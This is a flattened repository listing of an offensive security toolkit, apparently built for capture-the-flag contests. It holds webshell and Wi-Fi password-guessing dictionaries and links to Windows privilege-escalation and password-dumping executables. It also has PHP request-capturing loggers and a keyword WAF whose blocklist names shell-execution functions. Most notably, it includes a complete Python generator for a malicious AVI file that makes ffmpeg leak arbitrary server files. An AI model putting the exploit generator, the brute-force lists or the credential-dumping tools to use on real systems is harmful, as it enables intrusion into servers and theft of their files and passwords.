-------------------------------------------------------------------------------- 
/dict/web/DIR.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/DIR.txt -------------------------------------------------------------------------------- /dict/web/JSP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/JSP.txt -------------------------------------------------------------------------------- /dict/web/MDB.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/MDB.txt -------------------------------------------------------------------------------- /dict/web/PHP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/PHP.txt -------------------------------------------------------------------------------- /dict/webshell/shellpassword.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/shellpassword.txt -------------------------------------------------------------------------------- /dict/webshell/webshellPassword.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/webshellPassword.txt -------------------------------------------------------------------------------- /dict/webshell/webshell_password_no_name.txt: -------------------------------------------------------------------------------- 1 | 5201314 2 | 584521 3 | nohack 4 | 
45189946 5 | baidu 6 | chenxue 7 | 913720787 8 | cnot 9 | xxoxx 10 | rinima 11 | hkk007 12 | po 13 | chengnuo 14 | 5556661221 15 | 123456 16 | wrsk 17 | 54321 18 | yuemo 19 | jcksyes 20 | 521 21 | ******* 22 | 4lert 23 | yuemo 24 | hacker 25 | xxxxx 26 | 10011C120105101 27 | fclshark 28 | 19880118 29 | 376186027 30 | admin 31 | 654321 32 | 535039 33 | admin 34 | 000 35 | darkst 36 | jcksyes 37 | 123456 38 | jcksyes 39 | jinjin 40 | 12345 41 | sq19880602 42 | jtk2352 43 | sq19880602 44 | kill 45 | chengnuo 46 | 45189946 47 | 123321 48 | admin 49 | hacker 50 | admin 51 | admin 52 | haode 53 | chuang 54 | 981246 55 | et520 56 | winner 57 | 20080808 58 | yrpx 59 | hkk007 60 | wrsk 61 | rinima 62 | ceshi2009 63 | 5201314 64 | rfkl 65 | 847381979 66 | jing 67 | winner 68 | 4816535 69 | zhack 70 | mama520 71 | 123go 72 | 1 73 | 888999 74 | 13572468 75 | sasa 76 | dangdang 77 | lovehack7758 78 | rfkl 79 | 123 80 | 133135136 81 | 1992724 82 | yong 83 | noid 84 | caodan 85 | 96315001 86 | admin 87 | axiao 88 | 847381979 89 | rfkl 90 | yuemo 91 | yuemo 92 | 12 93 | 535039 94 | bzxyd 95 | tonecan 96 | bzxyd 97 | 5201314 98 | 3est 99 | sin 100 | 654321 101 | ghost 102 | C 103 | c 104 | z 105 | Z 106 | 023 107 | 23 108 | cai 109 | sb 110 | yong 111 | webadmin 112 | login 113 | 5909062xzx 114 | hehe 115 | -------------------------------------------------------------------------------- /dict/webshell/webshll木马常用密码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/webshll木马常用密码.txt -------------------------------------------------------------------------------- /dict/webshell/webshll木马常用密码1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/webshll木马常用密码1.txt 
-------------------------------------------------------------------------------- /dict/webshell/收藏的后门密码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/收藏的后门密码.txt -------------------------------------------------------------------------------- /dict/wifipass/wifi_password_top_100.txt: -------------------------------------------------------------------------------- 1 | 12345678 2 | 123456789 3 | 88888888 4 | 1234567890 5 | 00000000 6 | 87654321 7 | 66668888 8 | 147258369 9 | 11111111 10 | 987654321 11 | 11223344 12 | 123123123 13 | 66666666 14 | 0123456789 15 | 88889999 16 | 12341234 17 | 11112222 18 | a123456789 19 | 12344321 20 | 12345679 21 | a12345678 22 | 99999999 23 | a1234567 24 | 999999999 25 | abcd1234 26 | 1122334455 27 | 9876543210 28 | 23456789 29 | abc123456 30 | 123456789a 31 | qwertyuiop 32 | A1b2C3d4 33 | 88886666 34 | 123456780 35 | 12345687 36 | 12345678A 37 | 8888888888 38 | 012345678 39 | 22222222 40 | 1234554321 41 | 12345678910 42 | asdfghjkl 43 | 111222333 44 | 66778899 45 | 1234567899 46 | 77777777 47 | 00001111 48 | 12356789 49 | 123456788 50 | 888888888 51 | 0000000000 52 | 01234567 53 | 12345678900 54 | 55555555 55 | 321321321 56 | meiyoumima 57 | 98765432 58 | AA123456 59 | 789456123 60 | 1111111111 61 | 12121212 62 | 0987654321 63 | 12345677 64 | buzhidao 65 | 123456987 66 | 123321123 67 | 168168168 68 | 33333333 69 | 1234512345 70 | 1233211234567 71 | 01020304 72 | 111111111 73 | 123456789. 
74 | 369369369 75 | abc12345 76 | 000000000 77 | 123654789 78 | 77778888 79 | qq123456 80 | 1357924680 81 | 789789789 82 | 123456123 83 | abc123456789 84 | 55558888 85 | aaaaaaaa 86 | ABC12345678 87 | 1234567890123 88 | 11118888 89 | 55556666 90 | 741852963 91 | 963852741 92 | 110110110 93 | 12345689 94 | 55667788 95 | asd123456 96 | 777888999 97 | 12346789 98 | 12345600 99 | 1234567891 100 | -------------------------------------------------------------------------------- /exp/win/GetPass.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/GetPass.zip -------------------------------------------------------------------------------- /exp/win/GetPassword_x64.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/GetPassword_x64.zip -------------------------------------------------------------------------------- /exp/win/ms16-032.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/ms16-032.exe -------------------------------------------------------------------------------- /exp/win/ms16-032_x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/ms16-032_x64.exe -------------------------------------------------------------------------------- /exp/win/pr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/pr.exe -------------------------------------------------------------------------------- 
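/exp/win/pr_3389.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/pr_3389.exe
--------------------------------------------------------------------------------
/flowscript/flow.php:
--------------------------------------------------------------------------------
<?php
// NOTE(review): the listing lost this file's first lines (the "<?php" tag, the
// class header and the property declarations) to HTML stripping. The
// declaration below is reconstructed from the members the visible code uses
// and from the `new PhpFlowLog();` call at the bottom of the file.

/**
 * Request logger: collects method, selected headers, URI, protocol, client IPs,
 * time, content type, query string and request body, and appends a print_r()
 * dump of it to a log file. Everything runs from the constructor, so including
 * this file is enough to log the current request.
 *
 * Security notes (reviewer):
 *  - The log holds raw request bodies, so anything posted to the site —
 *    passwords included — ends up in it. The default path is a fixed name in
 *    /tmp, which every local user shares: the file is created 0600 below, but a
 *    local user who pre-creates /tmp/flow.log (or a symlink of that name) still
 *    receives the appends. Use a dedicated directory in production.
 *  - Header values are written unmodified; a client can embed newlines or a
 *    fake record separator in, say, User-Agent (log injection). Anything that
 *    parses this log must not trust the record boundaries.
 *  - HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are client-supplied headers and are
 *    recorded only as hints; REMOTE_ADDR is the only address the server saw.
 */
class PhpFlowLog
{
    /** @var array  collected request data; keys are listed on Flow() */
    public $flowdata;
    /** @var bool  assigned but not read in this file */
    public $redirect;
    /** @var string  path of the append-only log file */
    public $logfiles;

    public function __construct()
    {
        $this->flowdata = array();
        $this->redirect = false;
        $this->logfiles = "/tmp/flow.log";
        $this->Flow();
    }

    /**
     * Return $_SERVER[$key], or $default when the key is absent.
     *
     * The original indexed $_SERVER directly, which raises an "undefined index"
     * notice for every optional header the client did not send (Referer,
     * Client-IP, X-Forwarded-For, Content-Type on bodiless requests).
     */
    private function serverValue($key, $default = '')
    {
        return isset($_SERVER[$key]) ? $_SERVER[$key] : $default;
    }

    /**
     * Collect the current request into $this->flowdata and write it out.
     *
     * Keys written: method, header (Host / Referer / User_agent), uri, protocol,
     * ip (REMOTE_ADDR / CLIENT_IP / X_FORWARDED_FOR), time, ctype, get, post.
     */
    public function Flow()
    {
        /* Method */
        $this->flowdata['method'] = $this->serverValue('REQUEST_METHOD');

        /* Header: stored under the name minus "HTTP_", e.g. "User_agent" */
        $wanted = array('HTTP_HOST', 'HTTP_REFERER', 'HTTP_USER_AGENT');
        foreach ($wanted as $key) {
            $label = ucwords(strtolower(str_replace("HTTP_", "", $key)));
            $this->flowdata['header'][$label] = $this->serverValue($key);
        }

        /* Url and protocol */
        $this->flowdata['uri'] = $this->serverValue('REQUEST_URI');
        $this->flowdata['protocol'] = $this->serverValue('SERVER_PROTOCOL');

        /* IP: REMOTE_ADDR is observed by the server; the other two are headers */
        $this->flowdata['ip'] = array(
            'REMOTE_ADDR'     => $this->serverValue('REMOTE_ADDR'),
            'CLIENT_IP'       => $this->serverValue('HTTP_CLIENT_IP'),
            'X_FORWARDED_FOR' => $this->serverValue('HTTP_X_FORWARDED_FOR'),
        );

        /* Time */
        $this->flowdata['time'] = date('Y-m-d H:i:s', $this->serverValue('REQUEST_TIME', time()));

        /* CONTENT_TYPE */
        $ctype = $this->serverValue('CONTENT_TYPE');
        $this->flowdata['ctype'] = $ctype;

        /* GetData */
        $this->flowdata['get'] = json_encode($_GET);

        /* PostData.
         * The original guarded this with `isset($_POST) or ...['Method'] == 'post'`.
         * isset() on a superglobal is always true and the 'Method' key never
         * exists (the value lives under 'method'), so the body was in fact
         * captured for every request. That is kept deliberately: it also
         * records PUT/PATCH bodies.
         *
         * Form bodies are taken from $_POST. The original compared the content
         * type with == against the bare media type, so "...; charset=..."
         * variants and multipart/form-data fell through to php://input, and a
         * multipart body is not available there (PHP has consumed it), i.e. it
         * was logged as an empty string. Matching the media-type prefix fixes
         * that. */
        list($mediaType) = explode(';', $ctype, 2);
        $mediaType = strtolower(trim($mediaType));
        if ($mediaType === 'application/x-www-form-urlencoded' || $mediaType === 'multipart/form-data') {
            $this->flowdata['post'] = json_encode($_POST);
        } else {
            $this->flowdata['post'] = file_get_contents('php://input');
        }

        $this->Send("null");
    }

    /**
     * Append one record — $keyword, then a print_r() dump of flowdata — to
     * $this->logfiles. Returns 0, as the original did.
     *
     * The file is created owner-only before the first append (a plain
     * file_put_contents() would create it 0666 & ~umask, i.e. usually
     * world-readable), and LOCK_EX keeps records from concurrent requests from
     * interleaving, which the unlocked original allowed.
     */
    public function Send($keyword)
    {
        if (!file_exists($this->logfiles)) {
            touch($this->logfiles);
            chmod($this->logfiles, 0600);
        }
        $data = $this->flowdata;
        $record = "\r\n".$keyword."\r\n".print_r($data, true)."\r\n=====================================\r\n";
        file_put_contents($this->logfiles, $record, FILE_APPEND | LOCK_EX);
        return 0;
    }
}

new PhpFlowLog();
--------------------------------------------------------------------------------
/flowscript/index.php:
--------------------------------------------------------------------------------
<?php
// NOTE(review): the listing lost this file's first lines (the "<?php" tag, the
// class header and the property declarations) to HTML stripping. The
// declaration below is reconstructed from the members the visible code uses
// and from the `new WafLog('/tmp/')` call at the bottom of the file.

/**
 * Minimal access logger: rebuilds the request line plus a fixed set of headers
 * and appends them, followed by the raw body, to an hourly log file under
 * $filepath.
 *
 * Security notes (reviewer):
 *  - HTTP_COOKIE is logged, so the session identifier of every visitor lands in
 *    the log. The default directory is /tmp, shared with all local users; keep
 *    the log directory private or move it out of /tmp.
 *  - Header and body values are written verbatim; a client can forge record
 *    boundaries in the log (log injection).
 */
class WafLog
{
    /** @var string  directory the hourly log files are written to */
    public $filepath;
    /** @var array  captured headers, keyed by their $_SERVER name */
    public $header;

    public function __construct($filepath)
    {
        $this->filepath = $filepath;
        $this->header = array();
    }

    /**
     * Capture the current request and append it to this hour's log file.
     *
     * Record layout: "<ip>\t<time>\t\n<METHOD> <uri> <protocol>\r\n<headers>\n\n<body>\n\n".
     */
    public function Flow()
    {
        $wanted = array('HTTP_HOST','HTTP_USER_AGENT','HTTP_ACCEPT','HTTP_ACCEPT_LANGUAGE','HTTP_ACCEPT_ENCODING','HTTP_REFERER','HTTP_COOKIE','HTTP_X_FORWARDED_FOR','HTTP_CONNECTION');
        $server = $_SERVER;
        $HTTP_Method = isset($server['REQUEST_METHOD']) ? $server['REQUEST_METHOD'] : '';
        // 'H' (00-23) instead of the original 'h' (01-12): with a 12-hour field the
        // 03:00 and 15:00 logs shared one file.
        $Allfilepath = $this->filepath.'/'.date('Y-m-d-H').".log";
        foreach ($wanted as $name) {
            // isset() guard: absent optional headers used to raise notices
            $this->header[$name] = isset($server[$name]) ? $server[$name] : '';
        }
        $head = '';
        foreach ($this->header as $key => $value) {
            // The original tested `stripos($key, 'HTTP_') == -1`, which is never
            // true in PHP (stripos returns false, not -1), so every key took the
            // strip-the-prefix branch. That is the intended outcome for the
            // HTTP_* names above; test the prefix explicitly instead.
            if (stripos($key, 'HTTP_') === 0) {
                $key = ucwords(strtolower(substr($key, 5)));
            } else {
                $key = ucwords(strtolower($key));
            }
            $head .= $key.': '.$value."\r\n";
        }
        $request_url = isset($server['REQUEST_URI']) ? $server['REQUEST_URI'] : '';
        $protocol = isset($server['SERVER_PROTOCOL']) ? $server['SERVER_PROTOCOL'] : '';
        $post = file_get_contents('php://input');
        $ip = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
        // 24-hour clock; the original 'h' gave an ambiguous 12-hour timestamp
        $time = date('Y/m/d H:i:s');
        $content = $ip."\t".$time."\t\n".$HTTP_Method.' '.$request_url.' '.$protocol."\r\n".$head."\n\n".$post."\n\n";
        $this->WriteFile($Allfilepath, $content, FILE_APPEND);
    }

    /**
     * Write $content to $filepath with the given file_put_contents() flags.
     * LOCK_EX is added so records from concurrent requests are not interleaved.
     */
    public function WriteFile($filepath, $content, $FILE_APPEND = FILE_APPEND)
    {
        file_put_contents($filepath, $content, $FILE_APPEND | LOCK_EX);
    }
}

$Catchs = new WafLog('/tmp/');
$Catchs->Flow();
?>
--------------------------------------------------------------------------------
/flowscript/waf.php:
--------------------------------------------------------------------------------
<?php
// NOTE(review): the listing lost this file's first lines (the "<?php" tag, the
// class header, the property declarations and the constructor signature) to
// HTML stripping. The declaration below is reconstructed from the members the
// visible code uses. `new PhpFlowLog('test')` passes one argument, so the
// constructor takes one optional parameter; its original name and purpose are
// not visible (the first visible constructor lines reset $this->redirect to
// false regardless).

/**
 * Keyword WAF plus request logger. The request is captured into $flowdata
 * (same layout as the flow.php logger, plus 'filedata' for uploads), every
 * captured value is matched against a blacklist of SQL / PHP tokens, and a hit
 * logs the matches and terminates the request.
 *
 * Security notes (reviewer):
 *  - $logfiles lives under DOCUMENT_ROOT, so everything written there (saved
 *    uploads) is fetchable over HTTP by anyone who guesses a name. Move it out
 *    of the web root when possible; until then nothing written there carries a
 *    client-chosen name or extension.
 *  - A keyword blacklist is a speed bump, not a parser: inline comments between
 *    keyword letters, case tricks, and encodings the application decodes after
 *    this point all get through.
 *  - Header values are logged verbatim (log injection), and the per-hour log in
 *    /tmp is shared with every local user.
 */
class PhpFlowLog
{
    /** @var array  IP allow-list; unused, the branch that read it was commented out */
    public $checkips;
    /** @var array  collected request data */
    public $flowdata;
    /** @var bool|string  redirect host; false (always, see constructor) disables it */
    public $redirect;
    /** @var string  directory saved uploads are written to */
    public $logfiles;

    public function __construct($redirect = false)
    {
        $this->checkips = array('127.0.0.1');
        $this->flowdata = array();
        // Redirect: the original hard-coded false here too, so the constructor
        // argument never had an effect.
        $this->redirect = false;
        // files: created 0700 for the web-server user; the original used 0777,
        // which let any local user plant or replace files in a web-served dir.
        $this->logfiles = $_SERVER['DOCUMENT_ROOT'].'/logfiles/';
        if (!file_exists($this->logfiles)) {
            mkdir($this->logfiles, 0700, true);
        }
        // Run
        $this->Flow();
    }

    /**
     * Return $_SERVER[$key], or $default when the key is absent (avoids the
     * "undefined index" notices the original raised for optional headers).
     */
    private function serverValue($key, $default = '')
    {
        return isset($_SERVER[$key]) ? $_SERVER[$key] : $default;
    }

    /**
     * Capture the request, scan every captured value, and optionally redirect.
     */
    public function Flow()
    {
        /* Method */
        $this->flowdata['method'] = $this->serverValue('REQUEST_METHOD');

        /* Header: stored under the name minus "HTTP_", e.g. "User_agent" */
        $wanted = array('HTTP_HOST', 'HTTP_REFERER', 'HTTP_USER_AGENT');
        foreach ($wanted as $key) {
            $label = ucwords(strtolower(str_replace("HTTP_", "", $key)));
            $this->flowdata['header'][$label] = $this->serverValue($key);
        }

        /* Url and protocol */
        $this->flowdata['uri'] = $this->serverValue('REQUEST_URI');
        $this->flowdata['protocol'] = $this->serverValue('SERVER_PROTOCOL');

        /* IP: REMOTE_ADDR is observed by the server; the other two are headers */
        $this->flowdata['ip'] = array(
            'REMOTE_ADDR'     => $this->serverValue('REMOTE_ADDR'),
            'CLIENT_IP'       => $this->serverValue('HTTP_CLIENT_IP'),
            'X_FORWARDED_FOR' => $this->serverValue('HTTP_X_FORWARDED_FOR'),
        );

        /* Time */
        $this->flowdata['time'] = date('Y-m-d H:i:s', $this->serverValue('REQUEST_TIME', time()));

        /* CONTENT_TYPE */
        $ctype = $this->serverValue('CONTENT_TYPE');
        $this->flowdata['ctype'] = $ctype;

        /* GetData.
         * The original left this section empty, so query parameters were only
         * ever seen URL-encoded inside REQUEST_URI and "%73elect" went past the
         * scan. The decoded array is stored (Scan() walks arrays) so the scan
         * sees what the application sees. */
        $this->flowdata['get'] = $_GET;

        /* PostData.
         * The original condition (`isset($_POST) or ...['Method'] == 'post'`) was
         * always true — isset() on a superglobal is always true and the key is
         * 'method' — so the body was captured for every request; that is kept.
         * Form and multipart bodies come from $_POST (a multipart body is not
         * readable from php://input, and the original's exact == on the content
         * type sent "...; charset=..." and multipart requests there, logging an
         * empty string). Arrays are stored instead of json_encode() output so
         * that e.g. "file://" is scanned as written, not as "file:\/\/". */
        list($mediaType) = explode(';', $ctype, 2);
        $mediaType = strtolower(trim($mediaType));
        if ($mediaType === 'application/x-www-form-urlencoded' || $mediaType === 'multipart/form-data') {
            $this->flowdata['post'] = $_POST;
        } else {
            $this->flowdata['post'] = file_get_contents('php://input');
        }

        /* File */
        if (!empty($_FILES)) {
            foreach ($_FILES as $key => $fileobj) {
                $this->captureUpload($key, $fileobj);
            }
        }

        foreach ($this->flowdata as $key => $value) {
            $this->Scan($value);
        }

        // Redirect the (already logged) request elsewhere. Never taken while the
        // constructor leaves $redirect === false. REQUEST_URI is client-controlled;
        // PHP's header() refuses embedded newlines, so it cannot add headers here.
        if ($this->redirect) {
            header("Location: http://".$this->redirect.$_SERVER['REQUEST_URI']);
            exit('this is waf.....');
        }
    }

    /**
     * Record one $_FILES entry ($fileobj; a name[] field arrives with array
     * members and is handled file by file).
     *
     * Uploads under 1024 bytes are kept inline in flowdata (and scanned with the
     * rest of it); larger ones are saved under $logfiles and scanned directly.
     *
     * Fixes relative to the original:
     *  - `$this->this->flowdata` (a typo that aborted the request on the first
     *    upload) is `$this->flowdata`;
     *  - $_FILES keys are 'name' and 'size', not 'file_name' / 'file_size', so
     *    the size test and the recorded name never worked;
     *  - the saved copy is named from uniqid() with a fixed ".bin" extension.
     *    The original appended basename() of the client-supplied name under a
     *    directory inside DOCUMENT_ROOT, which let the client choose the
     *    extension of a file written into the web root — a web-shell drop
     *    through the WAF itself. md5(time()) was also identical for every file
     *    uploaded in the same second, so later files overwrote earlier ones;
     *  - failed or partial uploads (empty tmp_name) are skipped instead of
     *    being read from an empty path.
     */
    private function captureUpload($key, $fileobj)
    {
        $names = (array) $fileobj['name'];
        $tmps  = (array) $fileobj['tmp_name'];
        $sizes = (array) $fileobj['size'];
        foreach ($tmps as $i => $tmp) {
            if ($tmp === '' || !is_uploaded_file($tmp)) {
                continue;
            }
            $origName = isset($names[$i]) ? basename($names[$i]) : '';
            $size     = isset($sizes[$i]) ? (int) $sizes[$i] : 0;
            $bn = $this->logfiles . uniqid('upload_', true) . '.bin';
            $filedata = file_get_contents($tmp);
            $this->flowdata['filedata'][$key][$i]['orig_name'] = $origName;
            $this->flowdata['filedata'][$key][$i]['name'] = $bn;
            if ($size < 1024) {
                $this->flowdata['filedata'][$key][$i]['data'] = $filedata;
            } else {
                file_put_contents($bn, $filedata, LOCK_EX);
                $this->Scan($filedata);
            }
        }
    }

    /**
     * Terminate the request if $input (a string, or an array walked
     * recursively) contains a blacklisted token. On a hit the matches are
     * logged through Send() and echoed by die().
     *
     * Changes relative to the original:
     *  - arrays are walked. The original handed whole sub-arrays (header, ip,
     *    filedata) to preg_match_all(), which only raised an "Array to string
     *    conversion" notice and matched against the literal string "Array", so
     *    none of those values was ever inspected;
     *  - word-like tokens are matched on identifier boundaries. Now that headers
     *    are really scanned, the bare `and`, `sub`, `hex`, `dl` alternatives
     *    would otherwise block every User-Agent containing "Android" and every
     *    host name containing "sub". The backtick and "file://" tokens keep
     *    plain substring matching. Side effect: "1and1" no longer trips `and`.
     */
    public function Scan($input)
    {
        if (is_array($input)) {
            foreach ($input as $item) {
                $this->Scan($item);
            }
            return;
        }
        $input = (string) $input;
        $words  = "select|insert|update|delete|and|union|load_file|outfile|dumpfile|sub|hex|flag"; // sql inject
        $words .= "|file_put_contents|fwrite|eval|assert";
        $words .= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
        $words .= "|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|pcntl_exec";
        $pattern = "/(?<![A-Za-z0-9_])(?:$words)(?![A-Za-z0-9_])|`|file:\/\//i";
        if (preg_match_all($pattern, $input, $matches)) {
            $this->Send(json_encode($matches[0]));
            // WAF
            die(json_encode($matches[0]));
        }
    }

    /**
     * Append $keyword and a print_r() dump of flowdata to an hourly log in /tmp
     * (not $logfiles, which only receives saved uploads). Returns 0 like the
     * original.
     *
     * 'H' replaces the original 12-hour 'h' so morning and afternoon logs no
     * longer share a file; LOCK_EX keeps concurrent records whole.
     */
    public function Send($keyword)
    {
        $data = $this->flowdata;
        $record = $keyword."\r\n".print_r($data, true)."\r\n=====================================\r\n";
        file_put_contents("/tmp/".date("d-H").".log", $record, FILE_APPEND | LOCK_EX);
        return 0;
    }
}

new PhpFlowLog('test');

?>
--------------------------------------------------------------------------------
/gen_xbin_avi.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import struct
import argparse
import random
import string

AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi"

ECHO_TEMPLATE = """### echoing {needed!r}
#EXT-X-KEY: METHOD=AES-128, URI=/dev/zero, IV=0x{iv}
#EXTINF:1,
#EXT-X-BYTERANGE: 16
/dev/zero
#EXT-X-KEY: METHOD=NONE
"""

# AES.new('\x00'*16).decrypt('\x00'*16)
GAMMA = b'\x14\x0f\x0f\x10\x11\xb5"=yXw\x17\xff\xd9\xec:'

FULL_PLAYLIST = """#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
{content}
#### random string to prevent caching: {rand}
#EXT-X-ENDLIST"""

EXTERNAL_REFERENCE_PLAYLIST = """

#### External reference: reading {size} bytes from (unknown) (offset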
{offset}) 29 | #EXTINF:1, 30 | #EXT-X-BYTERANGE: {size}@{offset} 31 | (unknown) 32 | 33 | 34 | """ 35 | 36 | XBIN_HEADER = b'XBIN\x1A\x20\x00\x0f\x00\x10\x04\x01\x00\x00\x00\x00' 37 | 38 | 39 | def echo_block(block): 40 | assert len(block) == 16 41 | iv = ''.join(map('{:02x}'.format, [x ^ y for (x, y) in zip(block, GAMMA)])) 42 | return ECHO_TEMPLATE.format(needed=block, iv=iv) 43 | 44 | 45 | def gen_xbin_sync(): 46 | seq = [] 47 | for i in range(60): 48 | if i % 2: 49 | seq.append(0) 50 | else: 51 | seq.append(128 + 64 - i - 1) 52 | for i in range(4, 0, -1): 53 | seq.append(128 + i - 1) 54 | seq.append(0) 55 | seq.append(0) 56 | for i in range(12, 0, -1): 57 | seq.append(128 + i - 1) 58 | seq.append(0) 59 | seq.append(0) 60 | return seq 61 | 62 | 63 | def test_xbin_sync(seq): 64 | for start_ind in range(64): 65 | path = [start_ind] 66 | cur_ind = start_ind 67 | while cur_ind < len(seq): 68 | if seq[cur_ind] == 0: 69 | cur_ind += 3 70 | else: 71 | assert seq[cur_ind] & (64 + 128) == 128 72 | cur_ind += (seq[cur_ind] & 63) + 3 73 | path.append(cur_ind) 74 | assert cur_ind == len(seq), "problem for path {}".format(path) 75 | 76 | 77 | def echo_seq(s): 78 | assert len(s) % 16 == 0 79 | res = [] 80 | for i in range(0, len(s), 16): 81 | res.append(echo_block(s[i:i + 16])) 82 | return ''.join(res) 83 | 84 | 85 | test_xbin_sync(gen_xbin_sync()) 86 | 87 | SYNC = echo_seq(gen_xbin_sync()) 88 | 89 | 90 | def make_playlist_avi(playlist, fake_packets=1000, fake_packet_len=3): 91 | content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + playlist.encode('ascii') 92 | packet = b'00tx' + struct.pack(' 0: 105 | packet_size -= 16 106 | assert packet_size > 0 107 | part_size = min(packet_size, 64) 108 | packet_size -= part_size 109 | result.append(echo_block(gen_xbin_packet_header(part_size))) 110 | result.append( 111 | EXTERNAL_REFERENCE_PLAYLIST.format( 112 | size=part_size, 113 | offset=offset, 114 | filename=filename)) 115 | offset += part_size 116 | return ''.join(result), offset 117 | 
118 | 119 | def gen_xbin_playlist(filename_to_read): 120 | pls = [echo_block(XBIN_HEADER)] 121 | next_delta = 5 122 | for max_offs, filename in ( 123 | (5000, filename_to_read), (500, "file:///dev/zero")): 124 | offset = 0 125 | while offset < max_offs: 126 | for _ in range(10): 127 | pls_part, new_offset = gen_xbin_packet_playlist( 128 | filename, offset, 0xf0 - next_delta) 129 | pls.append(pls_part) 130 | next_delta = 0 131 | offset = new_offset 132 | pls.append(SYNC) 133 | return FULL_PLAYLIST.format(content=''.join(pls), rand=''.join( 134 | random.choice(string.ascii_lowercase) for i in range(30))) 135 | 136 | 137 | if __name__ == "__main__": 138 | parser = argparse.ArgumentParser('AVI+M3U+XBIN ffmpeg exploit generator') 139 | parser.add_argument( 140 | 'filename', 141 | help='filename to be read from the server (prefix it with "file://")') 142 | parser.add_argument('output_avi', help='where to save the avi') 143 | args = parser.parse_args() 144 | assert '://' in args.filename, "ffmpeg needs explicit proto (forgot file://?)" 145 | content = gen_xbin_playlist(args.filename) 146 | avi = make_playlist_avi(content) 147 | output_name = args.output_avi 148 | 149 | with open(output_name, 'wb') as f: 150 | f.write(avi) -------------------------------------------------------------------------------- /misc/Stegsolve.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/misc/Stegsolve.jar -------------------------------------------------------------------------------- /misc/ZipCenOp.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/misc/ZipCenOp.jar -------------------------------------------------------------------------------- /other/py-server-cmd.txt: 
